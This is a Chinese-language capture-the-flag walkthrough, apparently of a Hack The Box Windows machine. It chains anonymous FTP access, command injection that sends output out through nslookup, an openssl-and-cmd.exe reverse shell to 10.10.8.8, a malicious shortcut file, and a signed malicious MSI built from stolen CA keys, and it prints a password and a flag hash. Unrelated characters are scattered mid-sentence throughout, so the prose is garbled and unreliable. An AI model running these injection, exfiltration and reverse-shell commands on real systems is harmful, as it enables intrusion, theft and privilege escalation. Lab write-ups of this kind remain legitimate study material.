首先這題真的很難逸寓,要有充分的思想準(zhǔn)備和無(wú)數(shù)次的模擬環(huán)境搭建
1.利用匿名賬戶(hù)Anonymous登錄儒旬,可以發(fā)現(xiàn)FDISK.zip壓縮文件贡必,下載前將傳輸模式切換到binary某筐,否者經(jīng)常因?yàn)榫W(wǎng)絡(luò)因素導(dǎo)致下載失敗
Ftp服務(wù)器
2.解壓FDISK.zip,可以拿到一個(gè)鏡像文件啥酱。利用file命令識(shí)別后爹凹,發(fā)現(xiàn)這是一個(gè)FAT格式的磁盤(pán)。利用mount -t vfat /root/FDISK /mnt/htbdisk掛載磁盤(pán)镶殷,從中取出pbox.dat和pbox.exe兩個(gè)文件禾酱。安裝好xp虛擬機(jī)并雙擊運(yùn)行pbox.exe發(fā)現(xiàn)這是一個(gè)16位應(yīng)用程序,并不能直接運(yùn)行绘趋。
pbox.exe
3.16位程序模擬器很好找颤陶,DosBox是目前最有名的一款,很多當(dāng)年的街機(jī)游戲都可以運(yùn)行陷遮,像是波斯王子滓走、坦克大戰(zhàn)啊,這些我都還沒(méi)通關(guān)...進(jìn)入pbox首先還是掛載mount c c:\pbox帽馋,將此c:\pbox文件夾掛載為pbox的c盤(pán)搅方,這樣就可以在pbox中看到pbox.exe疫粥。但是直接運(yùn)行還是會(huì)報(bào)錯(cuò)如下:
pbox運(yùn)行報(bào)錯(cuò)
4.這可能是版本兼容的問(wèn)題,好在kali環(huán)境下也能安裝DosBox(apt-get install dosbox)腰懂,但因?yàn)镈os保護(hù)模式的原因,可能會(huì)報(bào)一個(gè)類(lèi)似< no DPMI - Get csdpmi*b.zip > 的錯(cuò)誤项秉。解決方式可以參考:https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html 解決問(wèn)題的核心關(guān)鍵就是下載CWSDPMI.EXE然后扔到pbox.exe目錄下绣溜,就可以正常運(yùn)行pbox.exe了。
pbox正常運(yùn)行
5.輸入的密碼是password娄蔼,進(jìn)去之后是一個(gè)數(shù)據(jù)庫(kù)怖喻,點(diǎn)擊相應(yīng)的表項(xiàng)就能看到相關(guān)內(nèi)容,從中可以導(dǎo)出一堆的用戶(hù)名密碼岁诉,其中有效的組合是:
user: alan
password: !C414m17y57r1k3s4g41n!
pbox數(shù)據(jù)庫(kù)
6.獲取的用戶(hù)名密碼可以用于登錄8080端口锚沸,這是一個(gè)Test Connection頁(yè)面,根據(jù)Ping Address提示涕癣,不難想到這是一個(gè)命令注入漏洞哗蜈。
8080端口登錄
7.需要解決的問(wèn)題是如何查看回顯,在linux環(huán)境中常用的是ping -p 外帶坠韩,但是windows的ping命令并沒(méi)有-p選項(xiàng)距潘,因此唯一能用的是nslookup命令,結(jié)合tokens參數(shù)篩選需要的命令結(jié)果只搁,同時(shí)需要利用cmd腳本的for循環(huán)來(lái)反饋結(jié)果音比,例如我需要看netstat -ano結(jié)果的第二行,即所有ip和端口結(jié)果氢惋,在web中輸入的命令為:
127.0.0.1 | for /f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.8
有關(guān)for /f的腳本循環(huán)體介紹可以看https://www.youtube.com/watch?v=jMS6LkMdAHI
需要注意的是tokens參數(shù)能夠級(jí)聯(lián)洞翩,比如我想看結(jié)果的1至6行,只需要添加tokens=1,2,3,4,5,6和相應(yīng)占位符%a.%b.%c.%d.%e.%f即可如:
127.0.0.1 | for /f "tokens=1,2,3,4,5,6" %a in ('type c:\xxxxx.txt') do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
在web端執(zhí)行命令注入后焰望,啟動(dòng)tcpdump或者wireshark都是可以的骚亿,過(guò)濾dns即可看到命令回顯:(下圖運(yùn)行的是tasklist,因?yàn)閚slookup在失敗時(shí)會(huì)執(zhí)行2次查詢(xún)柿估,所以結(jié)果會(huì)有重復(fù))
wireshark抓包結(jié)果
8.枚舉防火墻規(guī)則循未,netsh advfirewall firewall show rule name=all是查看windows防火墻規(guī)則的命令,但在該RCE環(huán)境中無(wú)法正常執(zhí)行秫舌,因此需要找到一處可寫(xiě)路徑的妖,將結(jié)果轉(zhuǎn)儲(chǔ)成文件,再用type方法將內(nèi)容取回足陨。通常c:\users\public目錄是權(quán)限最低的路徑嫂粟,但是直接寫(xiě)入是失敗的,嘗試?yán)胕cacls命令對(duì)目錄權(quán)限進(jìn)行枚舉墨缘,最終發(fā)現(xiàn)當(dāng)前用戶(hù)alan可以寫(xiě)入C:\users\public\desktop\shortcuts\星虹,最終讀取防火墻配置:僅允許TCP 73和136端口通信零抬。
枚舉權(quán)限:
127.0.0.1 & for /f "tokens=1,2,3," %a in ('icacls c:\users\public\Desktop*. /findsid alan /t /c /l') do nslookup %a.%b.%c 10.10.8.8
9.繼續(xù)搜索系統(tǒng)中的蛛絲馬跡,利用dir檢索C盤(pán)宽涌,最后在C:\Program Files (x86)目錄下發(fā)現(xiàn)安裝有Openssl-v1.1.0版本平夜,我們將利用它實(shí)現(xiàn)shell。
能顯示較完整dir結(jié)果的命令:
127.0.0.1 & for /f "tokens=1,2,3," %a in ('dir /B "C:\users\public\Desktop\Shortcuts"') do nslookup %a.%b.%c 10.10.8.8
10.openssl的CS工作模式對(duì)于我來(lái)說(shuō)并不熟悉卸亮,因此首先在本地構(gòu)建模擬環(huán)境忽妒,官網(wǎng)https://www.openssl.org可以查閱命令參數(shù),和下載源碼兼贸,但沒(méi)有安裝包驹针。各版本的安裝包可以通過(guò)http://slproweb.com/products/Win32OpenSSL.html下載俗或。安裝過(guò)程就是一路next不再贅述在跳。
openssl for windows
11.在kali端首先搭建openssl server你需要一個(gè)私鑰和一本證書(shū)拧篮,因此運(yùn)行命令:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
隨后有一些證書(shū)信息需要填寫(xiě),隨意就行螺垢,格式對(duì)就沒(méi)問(wèn)題喧务,例如電子郵件,國(guó)家簡(jiǎn)寫(xiě)
對(duì)命令參數(shù)有疑問(wèn)的可以參考IBM文檔:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0/com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html
生成證書(shū)
12.利用openssl的s_client連接服務(wù)器甩苛,在模擬環(huán)境中測(cè)試發(fā)現(xiàn)蹂楣,openssl的工作有些像沒(méi)有-e選項(xiàng)的nc,你輸入什么讯蒲,對(duì)方就顯示什么痊土,并不能執(zhí)行命令。由此可以想到利用管道符重定向輸入和輸出墨林,也就是將一個(gè)openssl的連接通過(guò)管道符“|”重定向給cmd.exe赁酝,再用一個(gè)管道符“|”將運(yùn)行結(jié)果重定向給openssl的另一個(gè)連接。簡(jiǎn)而言之就是:
openssl s_client 1 ---->input | cmd.exe | openssl s_client 2 ---->output
這也是為什么防火墻規(guī)則要放行兩個(gè)端口的原因旭等。
轉(zhuǎn)化為web端的RCE命令即:
10.10.8.8 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:136(RCE命令)
注意在實(shí)際攻擊目標(biāo)時(shí)酌呆,我們要同時(shí)開(kāi)兩個(gè)終端,一個(gè)openssl server 73和另一個(gè)openssl server 136搔耕,服務(wù)端監(jiān)聽(tīng)命令:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
我在73端口的終端里輸入命令并回車(chē)隙袁,然后在web端提交上述RCE命令將輸入壓入管道,在136端口的終端里查看結(jié)果
獲取shell
13.在獲取一個(gè)低權(quán)限的shell以后弃榨,我們能在c:\users\alan\Desktop路徑下拿到下一步的線(xiàn)索菩收。他告訴我們,在Public Desktop路徑中存在一個(gè)VS的快捷方式鲸睛,讓我們利用它娜饵。
線(xiàn)索文件
14.LNKUp是利用windows快捷方式執(zhí)行命令的惡意快捷方式生成器。項(xiàng)目地址:https://github.com/Plazmaz/LNKUp
命令格式:
python generate.py --host localhost --type ntlm --output out.lnk --execute
"C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73|cmd.exe|C:\Progra~2\OpenSSLv1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:136"
生成后的惡意快捷方式如下官辈,你可以看到需要執(zhí)行的命令在快捷方式目標(biāo)欄處箱舞。
惡意快捷方式
15.上傳惡意快捷方式遍坟,并覆蓋c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk。需要注意直接上傳.lnk文件可能失敗晴股,可以重命名為.txt后綴上傳愿伴。上傳過(guò)程同樣利用管道,但必須先斷開(kāi)原始連接电湘。
kali 運(yùn)行:openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < 惡意.txt
web運(yùn)行:10.10.8.8|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73 > c:\users\public\desktop\shortcuts\out.txt(注意上傳成功后改回后綴)
重新建立shell連接
shell運(yùn)行:del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy "c:\users\public\desktop\shortcuts\out.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk"
LNKUp
16.很快能夠獲得一個(gè)新的shell公般,在這個(gè)shell中,不需要依賴(lài)web胡桨,可以直接在73輸入,在136中查看結(jié)果瞬雹,操作順暢不少昧谊,在jorge用戶(hù)桌面拿下user.txt
user.txt
17.繼續(xù)搜索可以發(fā)現(xiàn),D盤(pán)存在兩個(gè)可疑文件夾酗捌,一個(gè)是Certs呢诬,里面保存有證書(shū)文件,另一個(gè)是DEV文件夾胖缤,里面保存了另一條線(xiàn)索文件尚镰。這條線(xiàn)索很好理解,只要生成一個(gè)惡意msi安裝包放到這個(gè)路徑下哪廓,Rupal用戶(hù)就會(huì)來(lái)點(diǎn)狗唉,結(jié)合證書(shū)文件,這很可能是要生成一個(gè)簽名后的msi
線(xiàn)索文件2
18.直接type證書(shū)文件會(huì)得到亂碼涡真,無(wú)法拷貝分俯。目前我們也沒(méi)有下載渠道,因此想到利用openssl的base64編碼功能哆料,將內(nèi)容打印出來(lái)缸剪,命令如下:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk
將base64編碼后的文本拷貝到kali,并利用base64 -d解碼還原东亦。
獲取證書(shū)
19.生成msi杏节,我們利用EMCO MSI Package Builder的圖形化界面來(lái)操作。先新建工程典阵,然后點(diǎn)擊Custom Actions奋渔,在右側(cè)Pre & Post Actions中右鍵新建動(dòng)作,填寫(xiě)關(guān)鍵參數(shù)后就可以Create MSI Package了萄喳。(密碼留空)
惡意msi生成
20.利用下載的證書(shū)對(duì)msi進(jìn)行簽名卒稳。這需要用到 .NET Framework 4 和winsdk,它們可以在以下地址下載:
.NET Framework 4 :https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk:https://www.microsoft.com/en-us/download/confirmation.aspx?id=8279
安裝好后他巨,就可以開(kāi)始簽名了充坑,命令依次如下:
makecert -n "CN=Ethereal" -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
如果簽名成功减江,可以看到如下提示:
簽名成功
21.將簽名后的msi上傳至d:\dev\msis\shell.msi,然后退出73和136的兩個(gè)openssl連接捻爷,重新監(jiān)聽(tīng)它們辈灼,大約1分鐘的時(shí)間,rupal用戶(hù)的shell就會(huì)上線(xiàn)也榄,可以在他的Desktop路徑下讀取root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f
22.若一次部署msi沒(méi)有成功巡莹,需要嘗試第二次,必須重新生成一個(gè)msi并簽名上傳甜紫,因?yàn)榘惭b過(guò)了的msi在系統(tǒng)中已經(jīng)注冊(cè)降宅,不會(huì)再運(yùn)行一次了,你可以從控制面板的添加刪除程序中看到它們囚霸,但現(xiàn)在在這個(gè)環(huán)境里我們沒(méi)有辦法卸載之前安裝的msi腰根。
添加刪除程序
